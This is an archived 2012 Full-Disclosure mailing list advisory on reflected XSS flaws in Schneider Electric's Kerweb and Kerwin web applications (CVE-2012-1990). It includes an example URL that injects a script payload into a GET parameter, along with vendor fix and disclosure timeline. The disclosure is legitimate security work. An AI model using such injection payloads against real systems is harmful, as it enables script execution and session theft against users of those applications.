|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: phocean (0x90
phocean.net)
Date: Sat May 05 2012 - 11:26:43 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Kerweb/Kerwin XSS vulnerabilities
Severity:
Moderate
Vendor:
Schneider Electrics
Versions Affected:
Kerweb < 3.0.1
Kerwin < 6.0.1
Description:
Input fields used for searching and displaying content are not filtered properly.
Thus, the web application suffers from multiple reflected XSS vulnerabilities.
Exploitation is made easier as parameters are passed with GET HTTP method.
Example:
An URL can be forged by injecting code in one of the parameter, like 'evtvariablename' here:
http://<server>/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=>variablevalue=<variablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=>dateapp=<dateapp=>daterec=<daterec=&evtvariablename="</script><script>alert(1)</script>"&evtdevicename=&evtnature=&evttype=>duration=<duration=>durationvalue=>durationwide=1<durationvalue=<durationwide=1
Vendor status:
Vendor was contacted and a fix was released (with Kerweb 3.0.1 and Kerwin 6.0.1)
Mitigation:
Upgrade to Kerweb 3.0.1 and Kerwin 6.0.1
CVE:
CVE-2012-1990
Timeline:
06/20/2011: vendor disclosure (ticket reference : KN10915)
07/22/2011: vendor response
09/01/2012: fix released
05/05/2012: public disclosure
--- phocean
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
iQIcBAEBAgAGBQJPpVTEAAoJEF6/MEmnTjwxTA0P/33X65Nq8XPfqNK1sz/u07Kr
Q9X36DQqd8u9dJj3GFLea1HFWCC24Ac+f/PAkv6GdS/vAXPMerxhAaoL2Fv4Lu5m
1dkC8gBKm4Vq3IeSWhM0qUALssMPMNtRqZVVa+NgdNoE3fmNfBsKap6EzxWv78PG
X/a1oZaj6rcCKi16sNpB8E6W0zfRL0zH2h+Kk96dA/8+LqHh58rWOfUQrA8HqffI
Eoi87pYHRoqin1M1vT6WCNtwLdt5Z1KXx0HUSUSa2XChEy4P0rV7TsIAf3BZPjwl
AZm3PUkR/fVP+yzcKUUzt0wd5NBvtFsfU1ssXTG3GjULUe2gtz3qhGTuHjrggspI
CjzDOASFLMkFITrUh5uKZC8ExGc0N7yRah4j/AfB2XK4dMyB5ygAMB+7iD5MQS07
Udmn+sD4UJQ4Ka/jiNrMJY2FOfJH3XPf9KiupNOgTRRAzA/KWQTYbyv7Kx+0Nvtc
NzCWuAs9c/pIZWuqZcvUZ+uxr46EoCr5kAXj1UP/Pz6p9qPdHz/hWaoR1gGD4kZM
1z/p7luvU8bufZGPwzLgZLL97JrIirPHsyWElfE3MPYInWnWvsfulIDZKs/BngED
6L9SC2g4BPFRQUt5zycECboMw+VAR8oh09nw0d/XspDGzLum13GQM5Dv/EUIkX1+
WDCAiDTxUCMCfvmISy0E
=0E06
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]